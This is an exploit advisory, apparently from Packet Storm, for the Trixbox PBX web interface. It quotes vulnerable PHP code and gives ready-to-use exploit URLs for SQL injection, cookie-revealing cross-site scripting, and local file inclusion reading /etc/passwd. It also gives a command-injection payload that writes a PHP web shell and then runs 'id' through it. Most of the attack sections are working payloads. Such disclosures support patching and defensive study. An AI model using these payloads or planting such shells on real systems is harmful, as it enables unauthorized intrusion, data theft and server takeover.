seeing is believing

Trixbox XSS / LFI / SQL Injection / Code Execution

Trixbox XSS / LFI / SQL Injection / Code Execution
Posted Jul 17, 2014
Authored by AtT4CKxT3rR0r1ST

Trixbox suffers from cross site scripting, local file inclusion, SQL injection, and remote code execution vulnerabilities.

tags | exploit, remote, local, vulnerability, code execution, xss, sql injection, file inclusion
MD5 | bc1ecf881c8629182265e2b58914d0e1

Trixbox XSS / LFI / SQL Injection / Code Execution

Change Mirror Download
Trixbox All Version - Multiple Vulnerabilties
===================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.trixbox.com/
####################################################################

[1] Sql Injection
===================
VULNERABILITY
##############
[I] /var/www/html/maint/modules/endpointcfg/endpoint_generic.php

Line 79-99:
case 'Submit':
$message = "";
$phone_vars['mac_address'] = cleanMAC($phone_vars['mac_address']);
if(!preg_match('/^[0-9A-F]{12}$/i', $phone_vars['mac_address']))
{$message = "MAC is invalid";}
if ($phone_vars['freepbx_device']!="NONE") { //get list of devices
from FreePBX
$phone_vars = PopulateFromFreepbx($phone_vars);
}
else
{
$phone_vars['phone_label'] =
$MACTABLE[substr($phone_vars['mac_address'],0,6)]['vendor'];

}

if ($_REQUEST['mac']){ // if there is an ID then edit an existing
phone
$querytxt = "UPDATE Generic SET ";
foreach ($phone_vars as $key => $value) {
$querytxt .= $key. " = '" .trim($value). "',";
}
$querytxt .= "EditDate = NOW() WHERE mac_address='" .
$_REQUEST['mac']."'";
$error = getSQL($querytxt,'endpoints');
}

#########
EXPLOIT
#########

Http://IP/maint/modules/endpointcfg/endpoint_generic.php?action=Submit&mac=1'
and 1=2 union select 1,2,3,4,5,6-- -

[2] Cross Site Scripting
===========================
VULNERABILITY
##############
[I] /var/www/html/user/help/html/index.php

Line 44:
$smarty->assign("id_nodo", $_GET['id_nodo']);

#########
EXPLOIT
#########

Http://IP/user/help/html/index.php?id_nodo="
onmouseover%3dprompt(document.cookie) bad%3d"


[3] Multiple Local File Include
=================================
VULNERABILITY
##############
[I] /var/www/html/maint/modules/home/index.php

Line 68-72:

$tbLang = $_GET['lang'];
$languageFile = 'language/'.$tbLang.'.php';
if(file_exists($languageFile)){
include($languageFile);
}

#########
EXPLOIT
#########

Http://IP/maint/modules/home/index.php?lang=../../../../../../../../etc/passwd%00

VULNERABILITY
##############
[II] /var/www/html/maint/modules/asterisk_info/asterisk_info.php

Line 17-25:

if(!empty($_GET['lang']) && isset($_GET['lang'])){
$tbLang = $_GET['lang'];
}else{
$tbLang = 'english';
}
$languageFile = 'language/'.$tbLang.'.php';
if(file_exists($languageFile)){
include($languageFile);
}

#########
EXPLOIT
#########
Http://IP/maint/modules/asterisk_info/asterisk_info.php?lang=../../../../../../../../etc/passwd%00

VULNERABILITY
##############
[III] /var/www/html/maint/modules/repo/repo.php

Line 9-13:

$tbLang = $_GET['lang'];
$languageFile = 'language/'.$tbLang.'.php';
if(file_exists($languageFile)){
include($languageFile);
}

#########
EXPLOIT
#########
Http://IP/maint/modules/repo/repo.php?lang=../../../../../../../../etc/passwd%00

VULNERABILITY
##############
[V] /var/www/html/maint/modules/endpointcfg/endpointcfg.php

Line 29-33:

if(!empty($_GET['lang']) && isset($_GET['lang'])){
$languageFile = includeLanguage($_GET['lang']);
include($languageFile);
$tbLang = $_GET['lang'];
}else{

#########
EXPLOIT
#########
Http://IP/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00

[4] Remote Code Execution
===========================
VULNERABILITY
##############
[I] /var/www/html/maint/modules/home/index.php

Line 339:

$phpOutput = shell_exec('php -q libs/status.php '.$tbLang);//exec('perl
libs/status.pl');

Line 68:

$tbLang = $_GET['lang'];

#########
EXPLOIT
#########

Http://IP/maint/modules/home/index.php?lang=MF;echo "<?php
system(\$_GET['cmd']);?> \$Greats 2 MY=\"Love:D">shell.php

Your Shell

Http://IP/maint/modules/home/shell.php?cmd=id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk) $Greats 2
MY="Love:D
####################################################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close